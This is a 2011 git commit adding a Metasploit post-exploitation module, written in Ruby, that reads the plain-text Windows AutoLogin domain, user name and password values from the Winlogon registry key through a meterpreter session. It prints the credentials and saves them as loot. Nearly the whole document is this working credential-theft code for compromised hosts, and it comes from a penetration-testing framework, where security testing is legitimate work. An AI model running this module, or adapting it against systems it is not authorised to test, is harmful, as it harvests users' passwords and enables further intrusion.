Post module for gathering Autologin User Credentials by Myo Soe

git-svn-id: file:///home/svn/framework3/trunk@13608 4d416f70-5f16-0410-b530-b9f4589650da
2011-08-22 00:37:09 +00:00
parent 981e47de06
commit 110094de1b
1 changed files with 120 additions and 0 deletions
@@ -0,0 +1,120 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+require 'msf/core/post/windows/registry'
+
+class Metasploit3 < Msf::Post
+	include Msf::Post::Windows::Registry
+	include Msf::Auxiliary::Report
+
+	def initialize(info={})
+		super( update_info( info,
+				'Name'          => 'Windows Gather AutoLogin User Credential Extractor',
+				'Description'   => %q{
+					This module extracts the plain-text Windows user login password in Registry.
+					It exploits a Windows feature that Windows (2000 to 2008 R2) allows a
+					user or third-party Windows Utility tools to configure User AutoLogin via
+					plain-text password insertion in (Alt)DefaultPassword field in the registry
+					location - HKLM\\Software\\Microsoft\\Windows NT\\WinLogon. This is readable
+					by all users.
+				},
+				'License'       => MSF_LICENSE,
+				'Author'        =>
+					[
+						'Myo Soe <YGN Ethical Hacker Group, http://yehg.net>'
+					],
+				'Version'       => '$Revision$', 
+				'Platform'      => [ 'windows' ],
+				'SessionTypes'  => [ 'meterpreter' ],
+				'References'     =>
+				[
+					[ 'URL', 'http://support.microsoft.com/kb/315231' ],
+					[ 'URL', 'http://core.yehg.net/lab/#tools.exploits' ]
+				]
+				
+		))
+	end
+
+
+	def run
+
+		host_name = sysinfo['Computer']
+		print_status("Running against #{host_name} on session #{datastore['SESSION']}")
+		
+		creds = Rex::Ui::Text::Table.new(
+			'Header'  => 'Windows AutoLogin Password',
+			'Ident'   => 1,
+			'Columns' =>
+			  [
+				'Domain',
+				'UserName',
+				'Password'
+			]
+		)	
+		
+		has_al = 0
+		
+		# DefaultDomainName, DefaultUserName, DefaultPassword
+		# AltDefaultDomainName, AltDefaultUserName, AltDefaultPassword
+		logon_key = "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\"
+		al = registry_getvaldata(logon_key, "AutoAdminLogon")
+		
+		do1 = registry_getvaldata(logon_key, "DefaultDomainName")
+		du1 = registry_getvaldata(logon_key, "DefaultUserName")
+		dp1 = registry_getvaldata(logon_key, "DefaultPassword")
+		
+		do2 = registry_getvaldata(logon_key, "AltDefaultDomainName")
+		du2 = registry_getvaldata(logon_key, "AltDefaultUserName")
+		dp2 = registry_getvaldata(logon_key, "AltDefaultPassword")
+		
+		if do1 != '' and  du1 != '' and dp1 == '' and al == '1'
+			has_al = 1
+			dp1 = '[No Password!]'
+			creds << [do1,du1,dp1]
+			print_good("DefaultDomain=#{do1}, DefaultUser=#{du1}, DefaultPassword=#{dp1}")
+		elsif do1 != '' and  du1 != '' and dp1 != ''
+			has_al = 1
+			creds << [do1,du1,dp1]
+			print_good("DefaultDomain=#{do1}, DefaultUser=#{du1}, DefaultPassword=#{dp1}")
+		end
+		
+		if do2 != '' and  du2 != '' and dp2 == '' and al == '1'
+			has_al = 1
+			dp2 = '[No Password!]'
+			creds << [do2,du2,dp2]
+			print_good("AltDomain=#{do2}, AltUser=#{du2}, AltPassword=#{dp2}") 
+		elsif do2 != '' and  du2 != '' and dp2 != ''
+			has_al = 1
+			creds << [do2,du2,dp2]
+			print_good("AltDomain=#{do2}, AltUser=#{du2}, AltPassword=#{dp2}") 
+		end
+		
+		if has_al == 0
+			print_status("The Host #{host_name} is not configured to have AutoLogon password")
+			return
+		end
+		
+
+		print_status("Storing data...")
+		path = store_loot(
+			'windows.autologin.user.creds',
+			'text/plain',
+			session,
+			creds,
+			'windows.autologin.user.creds.txt',
+			'Windows AutoLogin User Credentials'
+		)
+
+		print_status("Windows AutoLogin User Credentials saved in: #{path}")
+	end
+
+end